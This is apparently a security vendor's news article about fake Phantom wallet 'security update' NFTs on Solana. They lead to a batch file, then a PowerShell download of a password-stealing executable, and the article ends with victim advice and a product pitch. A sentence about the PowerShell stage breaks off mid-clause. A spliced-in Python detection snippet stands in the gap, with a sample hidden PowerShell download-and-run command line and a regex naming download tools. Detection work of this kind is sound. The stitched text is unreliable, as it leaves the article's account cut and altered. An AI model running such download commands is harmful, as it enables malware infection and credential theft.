Fake Solana Security Update NFTs Hide Password-Stealing Malware
Solana asset owners recently received rogue NFTs masquerading as Phantom wallet security update alerts that led them to install password-stealing malware on their devices.
Threat actors launched the malicious campaign two weeks ago by airdropping “PHANTOMUPDATE.com” and “UPDATEPHANTOM.com” NFTs to several Solana wallets. Attackers tricked users into believing the NFTs were security warnings sent by Phantom developers.
Opening the NFTs displayed a warning that a new Phantom update had been released. The rogue notification urged users to update their wallets as soon as possible to avoid “loss of funds due to hackers exploiting the Solana network.”
The notification also included a couple of websites that, when accessed, triggered an automatic Windows batch (.BAT) file download from Dropbox. Launching the file initially performs a check for Administrator rights and, if not found, displays a User Account Control (UAC) prompt asking for elevated permissions.
Granting the BAT permissions through the UAC dialog launches a PowerShell script that would eventually download another file named windll32.exe from GitHub and launch it from
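As an added illustration from the detection side (this is not code from the original article or Bitdefender's own tooling), the Python snippet below correlates constructed Sysmon-style process-creation events by parent pid to flag the chain described above: a downloaded .bat run by cmd.exe spawning PowerShell that fetches a file from GitHub, followed by execution of a binary named windll32.exe outside the Windows directory. The field names, file paths, pids and the GitHub URL are assumptions and placeholders, not values from the campaign.

```python
import re

# Constructed Sysmon-style process-creation events (not real telemetry) that
# model the chain described in the article: a downloaded .bat run by cmd.exe,
# PowerShell pulling a file from GitHub, then windll32.exe executing.
# Paths, pids and the GitHub URL are placeholders.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 101, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r'cmd.exe /c "C:\Users\u\Downloads\PhantomUpdate.bat"'},
    {"pid": 102, "ppid": 101,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell -w hidden -c \"Invoke-WebRequest "
            "https://github.com/PLACEHOLDER/windll32.exe -OutFile windll32.exe\""},
    {"pid": 103, "ppid": 102, "image": r"C:\Users\u\AppData\Local\Temp\windll32.exe",
     "cmd": "windll32.exe"},
    # Benign control: PowerShell fetching from GitHub directly under explorer.exe
    {"pid": 104, "ppid": 100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell -c \"Invoke-WebRequest https://github.com/PLACEHOLDER/README.md\""},
]

# Common PowerShell / built-in download primitives, matched case-insensitively.
DOWNLOAD_PATTERN = re.compile(
    r"invoke-webrequest|iwr\b|downloadfile|downloadstring|start-bitstransfer|curl\b|wget\b",
    re.IGNORECASE,
)

def find_chain(events):
    """Correlate process events by parent pid and return (rule, pid) findings."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        image = e["image"].lower()
        parent = by_pid.get(e["ppid"])
        # Rule 1: PowerShell spawned by cmd.exe that is running a .bat file, and
        # the PowerShell command line fetches something from GitHub.
        if (image.endswith("powershell.exe") and parent
                and parent["image"].lower().endswith("cmd.exe")
                and ".bat" in parent["cmd"].lower()
                and DOWNLOAD_PATTERN.search(e["cmd"])
                and "github" in e["cmd"].lower()):
            findings.append(("bat_spawned_powershell_github_download", e["pid"]))
        # Rule 2: a binary whose name mimics a system component (windll32.exe)
        # executing from outside the Windows directory, e.g. a user temp folder.
        if image.endswith("\\windll32.exe") and "\\windows\\" not in image:
            findings.append(("windll32_payload_executed", e["pid"]))
    return findings
```

Rule 1 is the higher-signal one: a batch file from the Downloads folder handing off to a hidden PowerShell download is unusual for legitimate software, while rule 2 catches the payload even if the PowerShell stage was missed.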
A Bleeping Computer analysis revealed that it was a strain of password-stealing malware that can extract various types of data from compromised systems, including cookies, passwords, SSH keys and browser information.
The campaign likely focused on crypto assets such as tokens and NFTs. However, password-stealing malware can wreak more havoc than just draining crypto wallets.
People who receive suspicious NFT airdrops should refrain from interacting with them and avoid visiting websites included in the assets’ description fields. To avoid inadvertently interacting with rogue NFTs, you can burn or hide them, depending on your wallet app’s capabilities.
If you have already accessed the URLs mentioned in the phony NFTs’ description field, scan your device for malware as soon as possible. Only once the malware is removed should you secure your assets and change potentially compromised passwords: changing passwords while you’re still infected could send your new password to the attackers, making it a futile effort.
Specialized tools like Bitdefender Ultimate Security can protect you against password-stealing malware and other types of cyber threats with an extensive range of features:
- 24/7 real-time data protection against viruses, worms, Trojans, zero-day exploits, ransomware, rootkits, spyware, and other e-threats
- Behavioral detection module that scans active apps and prevents infection upon detecting suspicious activity
- Anti-phishing system that detects and blocks suspicious websites that pose as legitimate ones to steal your data
- Anti-fraud module that notifies you whenever you land on websites that may try to scam you